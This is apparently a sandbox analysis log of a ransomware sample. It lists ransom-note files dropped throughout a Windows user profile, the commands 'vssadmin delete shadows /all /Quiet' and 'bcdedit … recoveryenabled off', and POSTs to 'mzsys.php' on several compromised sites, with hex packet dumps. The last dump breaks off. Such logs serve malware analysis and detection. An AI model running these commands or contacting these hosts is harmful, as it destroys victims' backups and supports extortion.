Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\appcompat.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Templates\excel.xls
Creates FileC:\Documents and Settings\Administrator\Templates\powerpnt.ppt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20MSI3716.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Templates\quattro.wb2
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jay.png
Creates FilePIPE\srvsvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jay.txt
Creates Processvssadmin.exe delete shadows /all /Quiet
Creates Processbcdedit.exe /set {current} recoveryenabled off
Creates Mutex__sys_234238233295

Process
↳ bcdedit.exe /set {current} recoveryenabled off

Process
↳ vssadmin.exe delete shadows /all /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNShnb.net
Type: A
222.165.133.242
DNSfirecheerleaders.fr
Type: A
213.186.33.171
DNSladiesdehaan.be
Type: A
62.210.92.9
DNSchonburicoop.net
Type: A
27.254.96.151
DNSpasslift.com
Type: A
217.116.196.239
DNSactionpourisrael.com
Type: A
213.186.33.4
HTTP POSThttp://hnb.net/templates/assets/email_tmpl/uploads/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://firecheerleaders.fr/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://ladiesdehaan.be/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://chonburicoop.net/tmp/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://passlift.com/templates/sj_icenter/html/mod_k2_content/Default/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://actionpourisrael.com/modules/mod_speedup/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Flows TCP192.168.1.1:1031 ➝ 222.165.133.242:80
Flows TCP192.168.1.1:1032 ➝ 213.186.33.171:80
Flows TCP192.168.1.1:1033 ➝ 62.210.92.9:80
Flows TCP192.168.1.1:1034 ➝ 27.254.96.151:80
Flows TCP192.168.1.1:1035 ➝ 217.116.196.239:80
Flows TCP192.168.1.1:1036 ➝ 213.186.33.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   61737365 74732f65 6d61696c 5f746d70   assets/email_tmp
0x00000020 (00032)   6c2f7570 6c6f6164 732f6d7a 7379732e   l/uploads/mzsys.
0x00000030 (00048)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000040 (00064)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000070 (00112)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000080 (00128)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000090 (00144)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x000000a0 (00160)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000b0 (00176)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000c0 (00192)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000d0 (00208)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000e0 (00224)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000f0 (00240)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x00000100 (00256)   0a486f73 743a2068 6e622e6e 65740d0a   .Host: hnb.net..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   3634350d 0a436163 68652d43 6f6e7472   645..Cache-Contr
0x00000130 (00304)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000140 (00320)   64617461 3d453738 38433145 37393637   data=E788C1E7967
0x00000150 (00336)   45353833 31363831 42453243 34433646   E5831681BE2C4C6F
0x00000160 (00352)   39344537 45434436 32333330 33433642   94E7ECD623303C6B
0x00000170 (00368)   37443141 46313141 45394641 38413331   7D1AF11AE9FA8A31
0x00000180 (00384)   39433642 34454346 38334445 45313143   9C6B4ECF83DEE11C
0x00000190 (00400)   45463441 41374542 33384531 34363641   EF4AA7EB38E1466A
0x000001a0 (00416)   38423332 43383343 39454335 39323643   8B32C83C9EC5926C
0x000001b0 (00432)   31393939 32393243 46303341 36314142   1999292CF03A61AB
0x000001c0 (00448)   32303132 35434543 41444136 42373141   20125CECADA6B71A
0x000001d0 (00464)   37463934 36413344 38373644 36353141   7F946A3D876D651A
0x000001e0 (00480)   33454241 33453139 43323134 30433831   3EBA3E19C2140C81
0x000001f0 (00496)   31314530 37464635 33303145 38434143   11E07FF5301E8CAC
0x00000200 (00512)   44353737 32394430 36334341 34424645   D57729D063CA4BFE
0x00000210 (00528)   35374637 33313545 31464132 32423441   57F7315E1FA22B4A
0x00000220 (00544)   37344445 46393343 35453538 31423031   74DEF93C5E581B01
0x00000230 (00560)   45393631 33383341 35434344 31414238   E961383A5CCD1AB8
0x00000240 (00576)   38334546 31343936 44434234 45344638   83EF1496DCB4E4F8
0x00000250 (00592)   32343545 35333530 41343745 35344239   245E5350A47E54B9
0x00000260 (00608)   30323038 42394445 36453941 43373833   0208B9DE6E9AC783
0x00000270 (00624)   32463543 36463745 44323935 39374344   2F5C6F7ED29597CD
0x00000280 (00640)   32383641 38443233 31433345 43434141   286A8D231C3ECCAA
0x00000290 (00656)   44443646 34363139 36453344 45374644   DD6F46196E3DE7FD
0x000002a0 (00672)   41303239 45344236 39314538 33453036   A029E4B691E83E06
0x000002b0 (00688)   37323939 39414135 36443544 45364545   72999AA56D5DE6EE
0x000002c0 (00704)   39424535 36394544 41454636 36413438   9BE569EDAEF66A48
0x000002d0 (00720)   37303337 37424334 33343631 45364633   70377BC43461E6F3
0x000002e0 (00736)   46463042 35433835 38384143 30323736   FF0B5C8588AC0276
0x000002f0 (00752)   39454343 33453431 39323839 42343736   9ECC3E419289B476
0x00000300 (00768)   36373044 31413243 31324341 37323844   670D1A2C12CA728D
0x00000310 (00784)   43434239 33384543 32304231 31444530   CCB938EC20B11DE0
0x00000320 (00800)   44333946 36364631 37333634 41413246   D39F66F17364AA2F
0x00000330 (00816)   38303645 43333131 30303944 33413944   806EC311009D3A9D
0x00000340 (00832)   38363635 41383545 30453945 43313235   8665A85E0E9EC125
0x00000350 (00848)   33433637 39413741 37353732 35413842   3C679A7A75725A8B
0x00000360 (00864)   43423931 37463341 46353145 44433931   CB917F3AF51EDC91
0x00000370 (00880)   33434246 33343945 39393238 35303430   3CBF349E99285040
0x00000380 (00896)   31463636 36443945 44443745 43413239   1F666D9EDD7ECA29
0x00000390 (00912)   37433032 43333745 38324542 30463037   7C02C37E82EB0F07
0x000003a0 (00928)   34454237 35433736 33304533 34454438   4EB75C7630E34ED8
0x000003b0 (00944)   32383641 43443331 37433946 44463641   286ACD317C9FDF6A
0x000003c0 (00960)   45343630 44                           E460D

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a2066 69726563 68656572   .Host: firecheer
0x00000100 (00256)   6c656164 6572732e 66720d0a 436f6e74   leaders.fr..Cont
0x00000110 (00272)   656e742d 4c656e67 74683a20 3634350d   ent-Length: 645.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d453738 38433145 37393637 45353833   =E788C1E7967E583
0x00000150 (00336)   31363831 42453243 34433646 39344537   1681BE2C4C6F94E7
0x00000160 (00352)   45434436 32333330 33433642 37443141   ECD623303C6B7D1A
0x00000170 (00368)   46313141 45394641 38413331 39433642   F11AE9FA8A319C6B
0x00000180 (00384)   34454346 38334445 45313143 45463441   4ECF83DEE11CEF4A
0x00000190 (00400)   41374542 33384531 34363641 38423332   A7EB38E1466A8B32
0x000001a0 (00416)   43383343 39454335 39323643 31393939   C83C9EC5926C1999
0x000001b0 (00432)   32393243 46303341 36314142 32303132   292CF03A61AB2012
0x000001c0 (00448)   35434543 41444136 42373141 37463934   5CECADA6B71A7F94
0x000001d0 (00464)   36413344 38373644 36353141 33454241   6A3D876D651A3EBA
0x000001e0 (00480)   33453139 43323134 30433831 31314530   3E19C2140C8111E0
0x000001f0 (00496)   37464635 33303145 38434143 44353737   7FF5301E8CACD577
0x00000200 (00512)   32394430 36334341 34424645 35374637   29D063CA4BFE57F7
0x00000210 (00528)   33313545 31464132 32423441 37344445   315E1FA22B4A74DE
0x00000220 (00544)   46393343 35453538 31423031 45393631   F93C5E581B01E961
0x00000230 (00560)   33383341 35434344 31414238 38334546   383A5CCD1AB883EF
0x00000240 (00576)   31343936 44434234 45344638 32343545   1496DCB4E4F8245E
0x00000250 (00592)   35333530 41343745 35344239 30323038   5350A47E54B90208
0x00000260 (00608)   42394445 36453941 43373833 32463543   B9DE6E9AC7832F5C
0x00000270 (00624)   36463745 44323935 39374344 32383641   6F7ED29597CD286A
0x00000280 (00640)   38443233 31433345 43434141 44443646   8D231C3ECCAADD6F
0x00000290 (00656)   34363139 36453344 45374644 41303239   46196E3DE7FDA029
0x000002a0 (00672)   45344236 39314538 33453036 37323939   E4B691E83E067299
0x000002b0 (00688)   39414135 36443544 45364545 39424535   9AA56D5DE6EE9BE5
0x000002c0 (00704)   36394544 41454636 36413438 37303337   69EDAEF66A487037
0x000002d0 (00720)   37424334 33343631 45364633 46463042   7BC43461E6F3FF0B
0x000002e0 (00736)   35433835 38384143 30323736 39454343   5C8588AC02769ECC
0x000002f0 (00752)   33453431 39323839 42343736 36373044   3E419289B476670D
0x00000300 (00768)   31413243 31324341 37323844 43434239   1A2C12CA728DCCB9
0x00000310 (00784)   33384543 32304231 31444530 44333946   38EC20B11DE0D39F
0x00000320 (00800)   36364631 37333634 41413246 38303645   66F17364AA2F806E
0x00000330 (00816)   43333131 30303944 33413944 38363635   C311009D3A9D8665
0x00000340 (00832)   41383545 30453945 43313235 33433637   A85E0E9EC1253C67
0x00000350 (00848)   39413741 37353732 35413842 43423931   9A7A75725A8BCB91
0x00000360 (00864)   37463341 46353145 44433931 33434246   7F3AF51EDC913CBF
0x00000370 (00880)   33343945 39393238 35303430 31463636   349E992850401F66
0x00000380 (00896)   36443945 44443745 43413239 37433032   6D9EDD7ECA297C02
0x00000390 (00912)   43333745 38324542 30463037 34454237   C37E82EB0F074EB7
0x000003a0 (00928)   35433736 33304533 34454438 32383641   5C7630E34ED8286A
0x000003b0 (00944)   43443331 37433946 44463641 45343630   CD317C9FDF6AE460
0x000003c0 (00960)   44bdf9                                D..

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a206c 61646965 73646568   .Host: ladiesdeh
0x00000100 (00256)   61616e2e 62650d0a 436f6e74 656e742d   aan.be..Content-
0x00000110 (00272)   4c656e67 74683a20 3634350d 0a436163   Length: 645..Cac
0x00000120 (00288)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000130 (00304)   61636865 0d0a0d0a 64617461 3d453738   ache....data=E78
0x00000140 (00320)   38433145 37393637 45353833 31363831   8C1E7967E5831681
0x00000150 (00336)   42453243 34433646 39344537 45434436   BE2C4C6F94E7ECD6
0x00000160 (00352)   32333330 33433642 37443141 46313141   23303C6B7D1AF11A
0x00000170 (00368)   45394641 38413331 39433642 34454346   E9FA8A319C6B4ECF
0x00000180 (00384)   38334445 45313143 45463441 41374542   83DEE11CEF4AA7EB
0x00000190 (00400)   33384531 34363641 38423332 43383343   38E1466A8B32C83C
0x000001a0 (00416)   39454335 39323643 31393939 32393243   9EC5926C1999292C
0x000001b0 (00432)   46303341 36314142 32303132 35434543   F03A61AB20125CEC
0x000001c0 (00448)   41444136 42373141 37463934 36413344   ADA6B71A7F946A3D
0x000001d0 (00464)   38373644 36353141 33454241 33453139   876D651A3EBA3E19
0x000001e0 (00480)   43323134 30433831 31314530 37464635   C2140C8111E07FF5
0x000001f0 (00496)   33303145 38434143 44353737 32394430   301E8CACD57729D0
0x00000200 (00512)   36334341 34424645 35374637 33313545   63CA4BFE57F7315E
0x00000210 (00528)   31464132 32423441 37344445 46393343   1FA22B4A74DEF93C
0x00000220 (00544)   35453538 31423031 45393631 33383341   5E581B01E961383A
0x00000230 (00560)   35434344 31414238 38334546 31343936   5CCD1AB883EF1496
0x00000240 (00576)   44434234 45344638 32343545 35333530   DCB4E4F8245E5350
0x00000250 (00592)   41343745 35344239 30323038 42394445   A47E54B90208B9DE
0x00000260 (00608)   36453941 43373833 32463543 36463745   6E9AC7832F5C6F7E
0x00000270 (00624)   44323935 39374344 32383641 38443233   D29597CD286A8D23
0x00000280 (00640)   31433345 43434141 44443646 34363139   1C3ECCAADD6F4619
0x00000290 (00656)   36453344 45374644 41303239 45344236   6E3DE7FDA029E4B6
0x000002a0 (00672)   39314538 33453036 37323939 39414135   91E83E0672999AA5
0x000002b0 (00688)   36443544 45364545 39424535 36394544   6D5DE6EE9BE569ED
0x000002c0 (00704)   41454636 36413438 37303337 37424334   AEF66A4870377BC4
0x000002d0 (00720)   33343631 45364633 46463042 35433835   3461E6F3FF0B5C85
0x000002e0 (00736)   38384143 30323736 39454343 33453431   88AC02769ECC3E41
0x000002f0 (00752)   39323839 42343736 36373044 31413243   9289B476670D1A2C
0x00000300 (00768)   31324341 37323844 43434239 33384543   12CA728DCCB938EC
0x00000310 (00784)   32304231 31444530 44333946 36364631   20B11DE0D39F66F1
0x00000320 (00800)   37333634 41413246 38303645 43333131   7364AA2F806EC311
0x00000330 (00816)   30303944 33413944 38363635 41383545   009D3A9D8665A85E
0x00000340 (00832)   30453945 43313235 33433637 39413741   0E9EC1253C679A7A
0x00000350 (00848)   37353732 35413842 43423931 37463341   75725A8BCB917F3A
0x00000360 (00864)   46353145 44433931 33434246 33343945   F51EDC913CBF349E
0x00000370 (00880)   39393238 35303430 31463636 36443945   992850401F666D9E
0x00000380 (00896)   44443745 43413239 37433032 43333745   DD7ECA297C02C37E
0x00000390 (00912)   38324542 30463037 34454237 35433736   82EB0F074EB75C76
0x000003a0 (00928)   33304533 34454438 32383641 43443331   30E34ED8286ACD31
0x000003b0 (00944)   37433946 44463641 45343630 44343630   7C9FDF6AE460D460
0x000003c0 (00960)   44bdf9                                D..

0x00000000 (00000)   504f5354 202f746d 702f6d7a 7379732e   POST /tmp/mzsys.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000030 (00048)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000060 (00096)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000070 (00112)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000080 (00128)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x00000090 (00144)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000a0 (00160)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000b0 (00176)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000c0 (00192)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000d0 (00208)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000e0 (00224)   0a486f73 743a2063 686f6e62 75726963   .Host: chonburic
0x000000f0 (00240)   6f6f702e 6e65740d 0a436f6e 74656e74   oop.net..Content
0x00000100 (00256)   2d4c656e 6774683a 20363435 0d0a4361   -Length: 645..Ca
0x00000110 (00272)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000120 (00288)   63616368 650d0a0d 0a646174 613d4537   cache....data=E7
0x00000130 (00304)   38384331 45373936 37453538 33313638   88C1E7967E583168
0x00000140 (00320)   31424532 43344336 46393445 37454344   1BE2C4C6F94E7ECD
